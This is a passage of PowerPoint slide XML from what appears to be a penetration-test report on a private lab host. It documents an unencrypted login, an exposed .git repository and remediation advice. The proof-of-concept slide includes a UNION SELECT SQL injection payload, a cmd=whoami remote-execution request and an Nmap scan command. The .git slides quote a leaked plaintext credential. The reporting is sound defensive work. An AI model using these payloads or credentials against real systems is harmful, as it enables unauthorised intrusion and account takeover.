                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Security_Cheat_Sheet.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Proof of Concept (PoC):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Credential Interception: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Observe login form submission over HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t> HTTP/1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>192.168.139.143 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>SQL Injection: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Exploit via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>dashboard.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>=' UNION SELECT 1,user(),3,4,5,6-- - HTTP/1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>192.168.139.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Remote Code Execution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Execute commands via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> parameter-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>index.php?cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> HTTP/1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>192.168.139.143</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105384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0D597-EA21-ACA3-89D1-414C21C8F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24D99-9BE7-5B4B-1863-B3D506945163}"/>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4D6435CA-E44C-3E59-061F-B30EDE5B9060}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="7056783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Process Analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>During reconnaissance, HTTP port 80 was found open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The login page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143/login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was served unencrypted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Further testing revealed lack of HTTPS and input filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>.git </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>directory and login credentials were accessible through the web interface</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Steps to Reproduce:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Scan target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0"/>
              <a:t> Nmap =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0"/>
              <a:t> -p- -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0"/>
              <a:t> 192.168.139.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>    2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> Open the page in a browser: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.139.143/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>    3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Intercept login request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>    4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> Attempt SQLi payloads via GET (e.g., ?id=1’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>    5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t> Exploit Chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>        HTTP → Credential leak → SQLi → RCE → Root access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Full system compromise (root access achieved).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Credential theft and lateral movement capability.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9F705AA-5D48-0466-6213-C22CC335AF4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7731794" y="883920"/>
            <a:ext cx="3139440" cy="1508891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3112E36A-E9EB-31CE-275C-A487158E5AAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6983987" y="2941849"/>
            <a:ext cx="4635054" cy="2644158"/>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2205139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CF493-DF82-5EE1-88D7-2EBB6BF35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31EF-7533-244B-3852-8B937DB6A7F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>Exposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" i="1" dirty="0"/>
              <a:t>.git </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>Repository</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{095BD8DD-A427-1EF4-8D43-F0A747B576BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Exposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>.git </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Repository Information Disclosure Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The target system had an accessible .git directory on its web server, which contained sensitive version control information including commit history, configuration files, and source code changes. This exposure allowed to reconstruct the repository and discover hardcoded credentials in historical commits.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Affected Machine, URL &amp; Parameter: Machine IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>: 192.168.139.143 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.139.143/.git/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Relevant Files: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>.git/HEAD, .git/logs/HEAD, .git/config, .git/index, .git/refs/heads/master</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>High,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The .git repository was publicly exposed, allowing us to extract hardcoded credentials and full source code. This directly enabled SSH access and further exploitation, justifying a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>High severity (CVSS 7.5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>rating.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Risk / Impact: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Complete or partial disclosure of application source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exposure of hardcoded credentials (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>jehad:fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>found in logs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Increased risk of exploitation via code auditing (e.g., finding hidden endpoints, logic flaws, vulnerable parameters)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can assist in chaining with other vulnerabilities like SSH access or SQLi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May lead to initial access, privilege escalation, or lateral movement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38888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A77B4-6037-9AA5-C87A-34081D22C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EA44A-A05A-3DDD-C608-B31D37C19D47}"/>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6CF5FD8A-7297-A55C-E357-33512A437B73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5476459"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>Recommendations:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Restrict access to version control directories via web server configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Implement robust .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> rules to prevent directory listing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Remove .git directories from production environments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Use git-archive for deployment instead of full repository</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Audit commit history for sensitive information before deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Implement Web Application Firewall rules to block access to VCS directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>CVSS Score</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>7.5 – High</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>CVSS String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>References: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Git Exposed - How to Identify and Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://medium.com/stolabs/git-exposed-how-to-identify-and-exploit-62df3c165c37</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
